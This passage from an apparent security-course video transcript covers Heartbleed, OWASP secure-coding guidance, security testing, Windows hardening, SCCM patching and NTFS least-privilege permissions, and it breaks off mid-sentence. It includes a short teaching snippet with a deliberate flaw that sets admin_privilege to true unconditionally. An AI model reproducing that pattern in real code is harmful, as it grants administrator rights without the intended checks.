However, the problem with the way that OpenSSL was coded and it's since been fixed, is that it lacked checks
between client-specified payload value in terms of bytes and what the actual size that was transmitted was.
Now, because this wasn't checked properly on the server side, then it resulted in the client being able to read
server memory contents beyond what was allocated for the variable containing the client data.
So essentially, an attacker could cause the server to read and return the contents of memory beyond the end of
the submitted packet data. And that, of course, violates secure coding practices. With secure coding, best
practices and recommendations will vary from programming language to programming language. So, if we're
scripting using a Unix or a Linux shell of some type or using Visual Basic or Microsoft PowerShell or
languages like C, C++, Java, and Python. There will be different best practices and recommendations although
there are some common threats. [The Secure Coding Cheat Sheet web page of www.owasp.org web site is
open. The web page is divided into two sections. The first section contains the navigation pane. The navigation
pane includes links such as Home, Books, and News. By default, the Home link is selected. The second section
includes the Page and Discussion tabs. By default, the Page tabbed page is open. The content of the Home link
is displayed in the second section. The second section includes links such as the Introduction, Session
Management, Input Data Validation, and Cryptography.] Consider, for example, the OWASP Secure Coding
Cheat Sheet on the screen listed now. In the overview or table of contents, we can see the categories related to
secure coding. For example, for User Authentication, Session Management, Input Data Validation. Let's go
ahead and click on that.
[He clicks the Input Data Validation link and its web page opens. This web page includes URLs such as
http://www.owasp.org/index.php/Input_Validation_Cheat_Sheet and
http://www.owasp.org/index.php/Logging_Cheat_Sheet. He clicks the
http://www.owasp.org/index.php/Input_Validation_Cheat_Sheet URL.] Here, we can click the link to read
about Input Data Validation as it relates to secure coding. [The Input Validation Cheat Sheet web page opens
in the www.owasp.org web site.] Now remember, it's going to vary whether you're using Python or C++ or
Java to write your code. But now that we're in the input validation documentation, we can start to go down and
read a little bit about the detail related to that. For example, with Java whether we're using server-side or
client-side code and so on. [He resumes the explanation of the secure coding. He is referring to the following
lines of code: $admin_privilege=$true, try, {, custom_function arg1 arg2, if ($condition -eq "Value"), {,
$admin_privilege=$true, }, }, catch. Code ends.] As a simple example, consider the code on the screen, where
an admin_privileges variable is being set to a value of true. Then we've got a try-catch block which captures
runtime problems or errors. And here, we're running a custom function and giving it some arguments. But then
there's an if statement testing a condition. And essentially it is setting the admin_privileges variable again to
being true.
Now the problem with the coding here is that the admin_privilege variable outside of the try-catch error loop
structure is setting the admin_privilege to true. So we don't want to give privileges unless, certain, very
specific certain conditions are met in a proper fashion. This type of obvious error would be quickly picked up
more likely than not with another set of eyes through peer review. In this video, we discussed secure coding.
In this video, you will learn how to properly test technology solutions for security.
Objectives
[Topic title: Security testing. The presenter is Dan Lachance.] In this video, I'll talk about security testing.
Security testing might be required by law or for regulatory compliance. In some cases, we might need to go
through third-party businesses to make sure that we have proper security testing in place to secure contracts.
Then, of course, we might have to pass audits or achieve some kind of accreditation such as PCI-DSS. Now
the PCI-DSS standard applies to organizations that work with card-holder data – such as credit and debit cards
to make sure that that data is protected properly.
Fuzzing means that we are feeding abnormal data to an application and we want to observe its results. So, for
instance, we might pass a number to a string variable, we might read beyond required memory to store a value
as was the problem related to the Heartbleed bug, or we might make sure that applications don't crash through
denial of service attacks. Many tools can be used to execute multiple fuzz tests against the target. So it could
be manual. But often, it's done in an automated fashion using a tool designed specifically for fuzz testing. Now
fuzz testing must be done from the perspective of a malicious user or a security tester just testing an
application.
A web application vulnerability scan is another way to test the security of an application. Now, again, this can
be manual or automated. There are tools such as Nexpose, Nikto, or Qualys-related tools that will do this type
of web app vulnerability scan for us that will check for things like standard misconfigurations or the allowing
of directory traversals through the web app file system. It'll check for the possibility of SQL injection attacks
due to improper field validation on web forms and also things like remote command execution.
A static code analysis is another part of security testing for an app which is often called white box testing. This
will apply to both compiled as well as noncompiled code. It tests applications' inputs as well as the outputs
depending on what was fed into the app. It's used to detect flaws, including things like backdoors. Backdoors
allow a malicious user into the application with escalated privileges without the system owners' knowledge. A
regression analysis can also be conducted. It's also considered to be a predictive analysis where we look at the
varying relationships between different application components. Sometimes, when you do security testing on
one component of an application, it appears to be solid. But, when we look at the interaction, we add more
moving parts, then we might realize that there is some kind of a security vulnerability.
So sometimes we might, for instance, have multiple code variables with differing values when that variable is
passed to a different application component. An interception proxy can also be used as part of security testing.
This is also called an inline proxy. It's used to crawl a web application, in other words, to pour over it looking
for weaknesses. The interception proxy also has the ability to capture and replay web-specific traffic for an
application where parameter values can be modified. So this is really akin to a man-in-the-middle attack, but
it's part of testing. We have to account for the fact that there are malicious users that will perhaps attempt these
types of attacks. And we have to think in the same way.
Interception proxies, however, are invisible to client web browsers. Now an example of an interception proxy
is the OWASP Zed Attack Proxy. [The OWASP Zed Attack Proxy Project web page is open in the
www.owasp.org web site. The web page is divided into two sections. The first section contains the navigation
pane. The navigation pane includes links such as the Home, Chapters, and News. By default, the Home link is
selected. The second section includes the Page and Discussion tabs. By default, the Page tab is open. The
Page tabbed page includes the Main, News, and Talks tabs. By default, the Main tabbed page is open. The
Main tabbed page includes the Download ZAP button, Download OWASP ZAP! link, and zap-extensions
link.] So, if you search up OWASP and Zed Attack Proxy, which I've done here, it's pretty easy to find the
web page that explains what the purpose of this is. Its purpose is to help find security vulnerabilities in web
applications. And really, this is a tool that we could use at various phases of the system development life cycle.
So there are plenty of tools that are available to automate security testing also in the form of interception
proxies, as seen here. [Dan resumes the explanation of security testing.] Despite our best technical efforts to
secure an application...and it's very important that we do this, in the end, user acceptance testing is what really
solidifies our solution as being usable. Does the solution behavior align with design requirements, and are user
needs addressed with our solution?
So we might identify problems that were missed during testing. And this might be brought about by end-user
testing. Maybe, for example, we've got a calculation feature in a web app that does work but is unacceptably
slow. We also have to think about regulatory and contractual compliance to make sure that the solution aligns
with those. In this video, we talked about security testing.
[Topic title: Host Hardening. The presenter is Dan Lachance.] In this video, I'll demonstrate how to harden a
Windows host to reduce the attack surface. The first thing that we should keep in mind is that reducing the
attack surface, really, means only keep things running that are absolutely required on that host operating
system. Now at the same time, we need to make sure software updates have been applied. [The Start page is
open. The page includes a search bar. Dan types update Services in the search bar. Then the links such as the
Windows Server Update services and the Windows Update link appear.] So here in my Windows Server, I'm
going to go to my Start menu and type in the word "update" and I'm going to choose Windows Update. [The
Windows Update page opens. The page is divided into two sections. The first section includes clickable
options such as the Check for update, Change settings, and View update history. The second section includes
the Download and install updates section. The Download and install updates section includes the Install
updates button.] On this particular host, we notice that we have the option to download and install updates in
the amount of 945 megabytes. So clearly, this machine is not fully up to date. However, I can see down below
when it most recently checked for updates. So today at 10:22 a.m. And I can see when updates were last
installed.
At the same time on the left, I can also View update history. [He clicks the View update history link and View
update history page opens. A table is displayed on this page. This table has four columns and several rows.
The column headers are Name, Status, Importance, and Date installed.] So I can see the individual updates
and whether or not the Status is Succeeded, the Importance of the update, and when it was installed. But how
do you deal with that on a large scale in an enterprise? For instance, if you're a datacenter administrator, how
do you make sure that your hypervisor hosts have all the updates? Surely, there's a better way than going to
each and every one and doing it manually. And of course, we can do that. [He opens the System Center
Configuration Manager from the task bar.] We're going to do that by using the SCCM management tool.
System Center Configuration Manager is a suite or is a product that is available from the System Center suite
available from Microsoft.
[The System Center Configuration Manager window is divided into two sections. The first section includes two
subsections. The second subsection includes the Assets and Compliance and Software Library tabs. The
Software Library tab is selected by default. The first subsection is the navigation pane. The navigation pane
includes the Overview root node. The Overview root node is selected. Under the Overview root node, the
Software Updates node is selected. Under the Software Updates node, the Software Update Groups folder is
selected. The second section includes a search bar and a table. The table contains nine columns and two rows.
The column headers are Icon, Name, Description, Date Created, Last Date Modified, Percent Compliant,
Created By, Deployed, and Downloaded. In the second row, the entry under the column header Name is Win 7
Required Updates, the entry under the column header Date Created is 4/7/2016 11:19 AM, the entry under the
column header Last Date Modified is 4/7/2016 11:19 AM, the entry under the column header Percent
Compliant is 33, the entry under the column header Deployed is Yes, and the entry under the column header
Downloaded is Yes.] Now here, I've gone into the Software Library workspace in the bottom-left. And over in
the left-hand navigator, under Software Updates, I'm going to click All Software Updates. [The All Software
Updates includes a table. The table includes eight columns and several rows. The column headers are Icon,
Title, Bulletin ID, Required, Installed, Percent Compliant, Downloaded, and Deployed. One row is
highlighted. In this row, the entry under the column header Required is 0, the entry under the column header
Installed is 0, the entry under the column header Percent Compliant is 100, the entry under the column header
Downloaded is Yes, the entry under the column header Deployed is Yes.] So what SCCM can do is it can
synchronize software update metadata, even from Microsoft Online, which it's done here. And we're looking at
the metadata here. And then from here, I can work with it and get it deployed internally. Ideally, a single
configuration could deploy required updates to potentially thousands of computers. So I don't have to visit
each of those computers for update purposes. So when I'm looking at an update here, [He is referring to a row
whose entry under the column header Title is Critical Update for Office 2003, the entry under the column
header Required is 0, the entry under the column header Installed is 0, the entry under the column header
percent compliant is 100, the entry under the column header is Downloaded is No, and the entry under the
Deployed column header is No. He right-clicks on this row and a flyout appears. The flyout includes options
such as Download, Deploy, and Move.] I could right-click on it and actually Download the binary files for it.
Because again, the only thing you're seeing here when you're looking at updates is the metadata. It's not the
actual files that comprise the update, they need to be downloaded. And we can see that option here when we
right-click on a single update.
Now we also have the option of Deploying the update to a device collections. [He clicks the Deploy option
and the Deploy Software Updates Wizard opens. This is divided into two sections. The first section includes
the General, Deployment Settings, and Alerts links. By default, the General link is selected. The second section
includes the Deployment Name text box, Collection text box, and Browse button. At the bottom right-hand
side, there are Next and Cancel buttons.] Down here at the bottom, I'll click the Browse button. [The Select
Collection dialog box opens. This dialog box is divided into two sections. The first section includes a drop-
down list and a navigation pane. The navigation pane includes the Root node. The Root node includes the
Toronto Collections subnode. The second section includes a search bar. At the bottom right-hand side, there
are OK and Cancel buttons. ] And I have the ability of selecting a collection, which is, really, just a group of
computers that I could have customized to deploy the updates to. [He clicks the Cancel button and switches
back to the Deploy software updates wizard. He clicks the Cancel button and the Configuration Manager
dialog box opens. This dialog box includes the Yes button and the No button. He clicks the Yes button and
switches back to the System Center Configuration Manager.] However, because updates are numerous, we
probably don't want to do that for individual updates like I've just demonstrated. Instead, for instance, you can
use Ctrl+click to select numerous updates. You could also search for updates here, up in the bar at the top.
Either way, when you've got multiple updates selected, you can right-click on them and Create Software
Update Group. [He has selected various rows in the table and right-clicks on one of the selected rows and then
a flyout appears. He highlights the Create Software Update Group option.] So they're grouped together in one
lump, instead of dealing with each individual update. Because, for instance, with Windows Server 2012 R2,
you know, on patch Tuesday, the second Tuesday of each month when Microsoft releases most of the updates,
you could have hundreds of updates. You probably want to group them into a Software Update Groups.
[He selects the Software Update Groups view present under the Software Updates folder.] Now I've already
got some created. So let's click on that Software Update Groups view on the left. And what I would do on the
right is right-click on the Software Update Group, Download the actual update files, and then Deploy to a
collection. So that way, we're doing it on a larger scale. But there's more than just deploying updates to harden
the system. [He minimizes the screen and switches back to the View update history screen.] What about
disabling unneeded services? Let's close down some of these screens, and let's go ahead and open up our list of
services here in Windows. [He opens the Services window. The screen is divided into two sections. The first
section includes the navigation pane. The second section includes a table with five columns and several rows.
The column headers are Name, Description, Status, Startup Type, and Log On As. He double-clicks the row
whose entry under the column header Name is BranchCache.] Here I've selected the BranchCache service for
my example. Let's say we know we don't need the BranchCache feature, so I'm going to go ahead and double-
click. [The BranchCache Properties dialog box opens. It includes the General and Log On tabs. By default,
the General tabbed page is open. It includes the Startup type drop-down list, OK button, Apply button, and
Cancel button.] Here the Startup Type has been set to Automatic. Now you have to be careful with this. You
have to do a bit of research and testing to ensure that there are no dependencies even from other services for
this service to be running.
So it requires a bit of homework ahead of time. But once you're sure it doesn't need to be running, you might
change its Startup type. For example, here I might change it to Manual or completely Disabled. Now, if I were
to do that, for instance, set the Startup type to Manual, [He selects the Manual drop-down option in the Startup
type drop-down list.] I could Apply the change. But notice that the Service would still be Running, so I could
also Stop it. So it's important whether we're using a Windows or Linux or UNIX operating system that we take
a look at the services or in Linux – the daemons that are running and determining which one should be
disabled. And in the UNIX and Linux world you're really disabling it for given run levels in many
distributions. [He clicks the Cancel button.]
Now aside from that there are other things that we should bear in mind too. [He closes the Services
window.] Here on my Windows Server, I can go ahead and open up my Local Group Policy Editor. [The
Local Group Policy Editor is divided into two sections. The first section is the navigation pane and the second
section is the content pane. The content pane includes a table with two columns and several rows. The column
headers are the Policy and the Security Setting.] Now in an Active Directory environment, you can configure
Group Policy Objects or GPOs, which could be applied to potentially thousands of computers that are joined to
your Active Directory domain. But here, I'm just going to configure my Local Group Policy. Either way, we've
got thousands of settings here that we could use to harden a host. So in the left-hand navigator in my Local
Computer Policy, you can see clearly, I've already gone under Computer Configuration - Windows Settings -
Security Settings. And, for instance, here under Local Policies, I have numerous security options that I could
apply to this server.
I've got Account Policies where I could configure the Password Policy – things like password reset settings,
minimum and maximum password age, and so on. Of course, every device on a network, whether it's a server
or a smartphone should have a host-based firewall. [He clicks the Windows Firewall with Advanced Security -
Lock firewall. The content pane includes the Overview section and the Getting Started section.] So I could
configure the inbound and outbound firewall rules on this server in this manner. [The Windows Firewall with
Advanced Security - Lock firewall includes the Inbound Rules and the Outbound Rules firewall. He clicks the
Inbound Rules firewall and then clicks the Outbound Rules firewall.] Of course, there are other ways to do it
including at the command line. I could also configure things like Software Restriction Policies – or the newer –
in the case of Windows, Application Control Policies to determine exactly which processes are allowed to run
on this particular host.
[He resumes from the desktop screen.] Of course, another aspect of hardening operating systems is to ensure
you have some kind of up-to-date and reliable antimalware scanner. Here, in my server, I'm going to search for
endpoint. [The start page opens and he types the endpoint protection in the search bar.] Here I'm using
System Center Endpoint Protection but really any antimalware solutions generally have the same configuration
settings. [He clicks the System Center Endpoint Protection link and the System Center Endpoint Protection
dialog box opens. The dialog box includes the Home tab, Update tab, and History tab. By default, the Home
tabbed page is open. There is a Scan options section on the right side. The Scan options includes the Quick
radio button, Full radio button, Custom radio button, and Scan now button. It includes the Quick radio button,
Custom radio button, and Scan now button.] So whether or not Real-time protection is enabled...here it's
Disabled on this server. But really it should be enabled. Notice that the Virus and spyware definitions here are
Up to date. Of course, if I go to the Update tab, I can see when that occurred. [The Update tabbed page
includes the information about the Definitions created on, the Definitions last update, and the Update
definitions button.] I can also get a list of History for quarantined or removed items. [He clicks the History
tab. The history tabbed page includes the Quarantined items and Allowed items radio buttons.] And I also
have numerous Settings. [He clicks the Settings tab. The Settings tabbed page includes two sections. The first
section includes the Scheduled scan, Default actions, and MAPS options. The second section includes the Scan
type drop-down list and the Cancel button.] Now notice a lot of them are grayed out. That's because it can be
centrally controlled.
[He maximizes the System Center Configuration Manager present in the task bar.] In this case, that's done
using SCCM. That would be under the Assets and Compliance workspace in the bottom left, where under my
left-hand navigator, I could expand Endpoint Protection. [He expands the Endpoint Protection folder. It
contains the Antimalware Policies and the Windows Firewall Policies. He clicks the Antimalware Policies.
The content pane includes a table with six columns and two rows. The column headers are Icon, Name, Type,
Order, Deployments, and Description. He clicks the row whose entry under the column header Name is
Default Client antimalware policy, the entry under the column header Type is Default, the entry under the
column header Order is 10000, and the entry under the column header Deployments is 0. Then the Default
Antimalware Policy dialog box opens. It is divided into two sections. The first section is the navigation pane
and it includes the Scheduled scans, scan settings, and Default actions options. The second section is the
content pane. It includes the Scan type drop-down list and the Scan time drop-down list. At the bottom right-
hand side of the Default Antimalware Policy dialog box are the OK and Cancel buttons.] And I could
configure Antimalware Policies that would be applied to my managed stations that are being managed by
SCCM. Now, of course, you've got numerous other things you should be doing to make sure hardening is
effective like periodic penetration testing and so on. In this video, we discussed ways of hardening a host to
reduce the attack surface.
Upon completion of this video, you will be able to recognize the importance of keeping hardware and software
up to date.
Objectives
[Topic title: Patching Overview. The presenter is Dan Lachance.] In life, nothing is perfect and that includes
firmware and software. One great countermeasure is to make sure these things are patched periodically.
Vulnerabilities get discovered over time with both firmware code and software. Patching can fix security and
stability problems discovered. When we decide that we're going to deploy patches especially on a larger scale,
we need a way to monitor that patch deployment to ensure it succeeded. We also should have an enterprise-
class solution that allows us to monitor for patch compliance so that at any given moment, we can run a report
to see which devices on the network do not comply with the latest patches and therefore present a security risk.
Many modern solutions also allow us to inject patches to operating system images. So, for example, we might
have a Windows 10 standard corporate image that we deploy to new desktops. But, if that image was built a
year ago, generally speaking, it's a year out of date with patches. So there are solutions such as Microsoft
System Center Configuration Manager, among others, that allow us to inject patches into the image itself even
without it being deployed. The benefit here is that when we deploy that image, it's up to date with the latest
patches.
[The System Center Configuration Manager window opens. The window is divided into two sections. The first
section is divided into two subsections. The second subsection includes the Software Library and Monitoring
tab. The first subsection is the navigation. In the navigation pane, the Overview root node is selected. Under
the Overview root node, the Operating systems node is open. Under the Operating Systems node, the
Operating Systems Images subnode is open. The second section includes a search bar and a table. The table
contains information about Windows 7 ENTERPRISEN.] For example, here in Microsoft System Center
Configuration Manager, I've got a Windows 7 ENTERPRISEN image. And, if I were to right-click on it, [A
flyout opens. The flyout includes options such as Schedule Updates, Refresh, and Delete.] I have the option to
Schedule Updates. [Dan clicks the Schedule Updates option and the Schedule Updates Wizard opens. The
Wizard is divided into two sections. The first section includes the Choose Updates, Set Schedule, and Summary
links. By default, the Choose Updates is selected. The second section includes the Select or unselect all
software updates in this list checkbox, the System architecture drop-down list, and a search bar. At the bottom
right-hand side of the Schedule Updates Wizard are the Next button, Summary, and Cancel buttons.] Now
when that dialog box opens up, the first page of the wizard gives me a list of related updates. In this case, for
Windows 7. And I can select or deselect the appropriate updates. Now when I click the Next button at the
bottom, I can then schedule when I want these injected into that image. [He clicks the Next button and the Set
Schedule page opens. It includes the As soon as possible radio button, the Continue on error checkbox, the
Update distribution points with the image checkbox, and the Next button. By default, the as soon as possible
radio button, the Continue on error checkbox, and the Update distribution points with the image checkbox are
selected.] So the beauty here is that when I deploy that Windows 7 ENTERPRISEN image in this specific
example, it will be up to date.
[He resumes the explanation of patching overview.] As mentioned, patching also deals with firmware updates.
So, at the hardware level, that includes things like BIOS updates on motherboards, wireless router firmware
updates to close security holes, printer firmware updates, router firmware updates, switches, mobile devices –
like smartphones, and Internet of Things or IoT firmware updates. These days IoT is used for a lot of consumer
devices like home video surveillance systems and the remote capability to control heating and lights and so on.
All of these types of firmware need to have the latest patches applied to make sure they work correctly, support
enhanced features, and, of course, close any known security vulnerabilities.
At the software level, of course, patching will apply fixes to operating systems, drivers, applications running
within the operating systems, or even mobile devices and the apps running on them. Pictured on the screen, we
see a screenshot of Windows Server Update Services or WSUS. [Running along the top of the Update Services
window is the menu bar. It includes menus such as the File, Action, and Window. The rest of the screen is
divided into two sections. The first section includes the navigation pane. In the second section, the Approved
Updates dialog box is open.] Now unlike SCCM, WSUS is available for free from Microsoft with their server
products. And what we see pictured here is a number of approved updates being applied for a group. We can
see in the left part of the diagram, we've got a Halifax_Computers group as well as an Update_Testing group.
These are groups of computers that we can target approved updates to. This way we know exactly which
devices are receiving which patches.
[He resumes the explanation of the patching overview.] Patching should also include deadlines whereby we
provide a notification to the user that a deadline is approaching and the patches will apply – regardless of what
the user selects. However, when we apply patches, this can slow down the computer and the network. And the
last thing we really want to do is hamper user productivity. But, at the same time, we must adhere to
organizational security standards for patching and security. So what we might do is configure maintenance
windows. A maintenance window is supported by various products and it's usually after hours where
maintenance is allowed, such as the application of software updates. The idea with the maintenance window is
to minimize the disruption to the end user. We can also configure the reboot behavior. So for example, if a user
is using their laptop to present something in a boardroom, we don't want their computer rebooting in the
middle of their presentation.
So, of course, there are many ways to get around that, including making sure that we use maintenance
windows after hours. And also, there are some software tools that can run in presentation mode that will ignore
any things like patch reboot requirements and so on until our presentation is complete. License agreements
apply to some software updates. This might be automated or the end user might have to interact with the
installation of an update to accept our license agreement.
In this video, learn how to apply patches properly to secure network hosts.
Objectives
[Topic title: Use SCCM to Deploy Patches. The presenter is Dan Lachance. Dan resumes from the System
Center Configuration Manager, and the Software Updates folder is open.] In this video, I'm going to
demonstrate how to use System Center Configuration Manager to deploy patches. We all know that one
important part of hardening hosts is to apply operating system and application software updates. Microsoft
SCCM or System Center Configuration Manager has a built-in way to centrally deploy updates and also run
reports to make sure that they were deployed successfully. In the SCCM management console on the left, I've
already gone under the Software Library workspace in the bottom left. And on the left, in the navigator, I've
gone under Software Updates.
Now it's already been configured to synchronize Software Updates metadata with Microsoft Online. So now
that I've done that, I'm going to click on All Software Updates on the left, which shows me many software
updates. [The Software Updates folder includes the All Software Updates and the Software Update Groups
options. Then, in the content pane, information about many software updates is displayed in a table with eight
columns and several rows. The column headers are Icon, Title, Bulletin ID, Required, Installed, Percent
Compliant, Downloaded, and Deployed.] Actually, specifically the metadata on the right-hand side. So we've
got for Office 2003, some .NET Framework updates and as I go down through the list, we've got numerous,
numerous, numerous updates. Now of course, if you're going to be working with deploying updates centrally
in some kind of management tool, you want to make sure that you're only synchronizing updates for software
that you use. Now SCCM specifically onto itself by default, only allows you to deploy updates for Microsoft
products. If you need to deploy updates for other products, like Symantec or McAfee or Adobe and so on, then
either use some other tool outside of Microsoft or you can use the Microsoft System Center Update Publisher
tool, which you have to download and configure.
Anyway, here in All Software Updates, I could right-click an individual update that I want deployed to a
machine or machines. [He right-clicks the row whose entry under the column header Title is Update for
Microsoft Outlook 2010, the entry under the column header Required is 0, the entry under the column header
Installed is 0, the entry under the column header Percent Compliant is 0, the entry under the column header
Downloaded is No, and the entry under the column header Deployed is No. Then a flyout appears and it
includes the Download, Deploy, and Move options.] I could Download the binary files for that update because,
again, all we're looking at here is the metadata for the updates. And then I could deploy it by clicking
Deploy [The Deploy Software Updates Wizard opens. It is divided into two sections. The first section is the
navigation pane. The navigation pane includes links such as General, Deployment Settings, and Alerts. By
default, the General link is selected. The second section includes the Browse button and the Deployment Name
text box. At the bottom right-hand side of the Deploy Software Updates Wizard are the Cancel and Next
buttons.] and then specifying a device collection. [He clicks the Browse button and the Select Collection
window opens. The window is divided into two sections. The first section includes a drop-down list and the
navigation pane. The second section includes a search bar.] So you can't deploy updates to collections of
users. In SCCM, a collection is like a group. So you could have groups of computers that mirror departments,
the type of operating system, or the fact that they're laptops, or even geographical locations – it doesn't matter.
But once your collections are built, then it facilitates deploying things to them. In this case, software
updates. [He clicks the Cancel button and resumes from the Deploy Software Updates Wizard.]
Now instead of deploying individual updates normally, [He clicks the Cancel button and then the
Configuration Manager dialog box opens. He clicks the Yes button and the dialog box closes. He switches
back to the System Center Configuration Manager.] what one would do with this tool is select numerous
updates and put them in a software update group and manage the group of updates as an entity instead of the
individuals. So what I could do here is manually go through the list and, for example, Ctrl+click to select
multiple updates or over in the upper right, I could click Add Criteria and I could search for update metadata
that meet certain conditions. [He clicks the Add Criteria drop-down list. It includes Product, Total, and Type
drop-down options and the Add and Cancel buttons.] So maybe, what I'll do here is I'll search for things like
Product. I'll click Add. Now here, it's already got the product it's searching for – Active Directory Rights
Management Services Client 2.0 – that's not what I want. I'll go ahead and click on that link. [He clicks the
Active Directory Rights Management Services Client 2.0 link and a drop-down list appears. It includes the
Windows 7 and the Windows 8 drop-down options.] And maybe here, I'm just going to scroll all the way down
and I'm going to choose, for instance, Windows 7 assuming that's what I'm using in my environment. Then I'll
go ahead and click Search.
Now of course, I could add multiple criteria here to look for specific Windows 7 settings. But, in this case, I've
got all my Windows 7 settings listed in my search results. So what I would do at this point is, for example,
click in the list and press Ctrl+A to select them all. And here, I'm going to right-click and choose Create
Software Update Group called Win 7 Updates - All. [He selects the Create software update group option from
the flyout. Then the Create Software Update Group dialog box opens. It includes the Name text box, the
Description text box, the Create button, and the Cancel button.] And I'll Create that update group. [He types
Win 7 Updates - All in the Name text box and then clicks the Create button.] So it's always easier to manage
things on a larger scale in groups rather than individually. Now that's going to show up under the Software
Updates Group which I'll click on the left. So we can see on the right here now that we've got our Win 7
Updates - All software update group. So from here, I would right-click and Download all of the files and then I
would Deploy it to a device collection. Now that will take time depending on how many updates are involved
in the update group and what your internet connection speed is like.
But once that's been done, under the Monitoring tab, down in the bottom left, and then in the Reporting area,
on the left in the navigator, I could expand reports. Here, I've got numerous report categories that I could work
with to see if software updates have been applied correctly. So notice all the Software Updates categories of
Reports, such as Software Updates – C Deployment States. So I could click on that and here I have numerous
reports I could run. [The content pane includes various reports such as the States 1 - Enforcement states for a
deployment and the States 2 - Evaluation states for a deployment.] Now running the report, of course, simply
means right-clicking and choosing Run. [He right-clicks the States 2 - Evaluation states for a deployment
option. Then a flyout appears and selects the Run option. Then the States 2 - Evaluation states for a
deployment window opens.] And, in some cases, some reports will have parameters that you must specify, like
date ranges or collections. But either way, this is a nice centralized way on a larger scale to deploy and manage
and monitor updates. In this video, we learned how we can use SCCM to deploy patches.
During this video, you will learn how to set the correct access to file systems while following the principle of
least privilege.
Objectives
set the correct access to file systems while adhering to the principle of least privilege
[Topic title: File System Permissions. The presenter is Dan Lachance. The Active Directory Users and
Computers window is open. Running along the top is the menu bar. It includes the File, Action, and Help
menus. The rest of the screen is divided into two sections. The first section is the navigation pane. The Active
Directory Users and Computers is the root node, which includes the Saved Queries folder and the
fakedomain.local node. The fakedomain.local node includes Builtin, Computers, Users, and Managed Services
Accounts folders. By default, the Users folder is selected. The second section of the screen is the content pane.
It contains a table with three columns and several rows. The column headers are Name, Type, and
Description. By default, the row whose entry under the column header Name is Help Desk and the entry under
the column header Type is Security Group is highlighted.] In this video, I'll demonstrate how to set NTFS file
permissions on a Windows Server. Whenever we assign permissions to any type of network resource, we need
to make sure that we're adhering to the principle of least privilege and what that means is that we're only
granting enough privileges for a task to be completed and nothing more. So in the Windows world, for
instance, the last thing we want to do when someone needs basic file system access is to add them to an
administrators group. That's way too much power. Here in Active Directory Users and Computers, we've got a
user called HelpDesk User1. And, if we open up the Help Desk by double-clicking and go to the Members tab,
we can see that that user is a member of the Help Desk group. [Dan double-clicks the row with the entry Help
desk, and the Help Desk Properties dialog box opens. The Help Desk Properties dialog box includes the
General tab, the Members tab, and the Managed By tab. He clicks the Members tab. The Members tabbed
page includes the Add, Remove, and OK buttons. He clicks the OK button and the Help Desk Properties dialog
box closes.]
[The Data (I:) window opens. Running along the top is the menu bar. It includes the File, Share, and View
menus. The rest of the screen is divided into two sections. The first section is the navigation pane. The
navigation pane includes the Favorites, This PC, and Network nodes. The Favorite node includes the Desktop
and the Downloads subnodes. The This PC node includes the Desktop, Data (I:), and Videos subnodes. By
default, the Data (I:) subnode is selected. The second section contains the content pane. It includes the
Program Files folder and the UserDataFiles folder.] So let's go over to the file system where on Data (I:) –
my data drive on my server – I've got a folder called UserDataFiles. The goal here is to ensure that the Help
Desk group has the ability to create folders under UserDataFiles. But what we don't want is the Help Desk
group having the ability to modify user files. So to make that happen, we begin by right-clicking on the
UserDataFiles folder and going into Properties. [The UserDataFiles Properties dialog box opens. It includes
the General, Security, and Sharing tabs.] For NTFS security, we have to go onto the Security tab, so I'll click
on that. [The Security tabbed page opens in the UserDataFiles Properties dialog box. It includes the
Permissions for CREATOR OWNER drop-down list, Edit button, and Advanced button. At the bottom right-
hand side of the UserDataFiles Properties dialog box are the Ok and Cancel buttons. The Permissions for
CREATOR OWNER drop-down list includes the Full control, Modify, Special Permissions, and Read drop-
down options.] Now there are some precanned NTFS permissions as you see here on the left like Full control,
Modify, Read & execute, and so on. But, if you look through the list, there is nothing here about creating
folders.
So that's considered a Special permission. It's a little more granular. So I'm not going to click the Edit button
because I want to add more specific permissions otherwise called Special permissions. For that, I'll click on the
Advanced button [He clicks the Advanced button and the Advanced Security Settings for UserDataFiles dialog
box opens. It includes the Permissions, Auditing, and Effective Access tabs. By default, the Permissions tabbed
page is open. The Permissions tabbed page includes the Add, OK, and Cancel buttons.] and from here, I'm
going to click Add. [The Permissions Entry for UserDataFiles dialog box opens. It includes the Select a
principal link, the Type drop-down list, the Applies to drop-down list, the Basic permissions section, and the
Cancel button.] I'll then click on the Select a principal link [The Select User, Computer, Service Account, or
Group dialog box opens. It includes the Enter the object name to select text box, the Advanced button, the
Check Names button, and the OK button.] and I want to add the Help Desk group. [He enters the name help
desk in the Enter the object name to select text box and clicks the Check Names button.] So I'll go ahead and
type that in and check the name, looks good. I'll click OK. [The Select User, Computer, Service Account, or
Group dialog box closes and the Permission Entry for UserDataFiles dialog box appears on the screen.] So
my Help Desk group can either be Allow or Deny access to this part of the file system. [He clicks the Type
drop-down list. It includes the Allow and the Deny drop-down options.] Well, we want to Allow it in our
scenario. I want to make sure that they are allowed with the permissions that we will set to the folder itself as
well as subfolders and files within it, whether they exist now or they will exist later because permissions in the
file system get inherited by default. [He clicks the Applies to drop-down list. It includes the This folder only
and the This folder, subfolders and files drop-down options.]
Now notice that when you add an entry to an ACL – so here, the entry is the Help Desk group that they get
Read & execute, List folder contents, and Read permissions by default. [The Basic permissions section
includes the Read & execute checkbox, the List folder contents checkbox, the Read checkbox, and the Show
advanced permissions link. These checkboxes are selected.] That's not enough because we need the Help Desk
group to be able to create folders. For that over on the far right, I'm going to have to click the Show advanced
permissions link. Now you'll notice that one of the permissions that is available is Create folders / append data.
So I'm going to turn that one on and that's it. I'm going to click OK. [The Permission Entry for UserDataFiles
dialog box closes.] And I'll click OK [He clicks the OK button in the Advanced Security Settings for
UserDataFiles dialog box. Then this dialog box closes.] and OK again. [He clicks the OK button in the
UserDataFiles Properties dialog box. Then it closes and the Data (I:) window is displayed.] Now that puts us
back in Windows Explorer. Now that we've applied those changes, let's actually go back and double check our
work. We can do that by right-clicking on the folder and going into Properties. [He right-clicks the
UserDataFiles folder and clicks the Properties option from the flyout.] Then again, clicking on the Security
tab, again clicking the Advanced button, but this time we're going to click the Effective Access tab, where
we're going to Select a user that's in that group. [The Effective Access tabbed page includes the Select a user
link, the select a device link, and the View effective access button. At the bottom right-hand side of the
Advanced Security settings for UserDataFiles dialog box are the OK and Cancel buttons. He clicks the Select
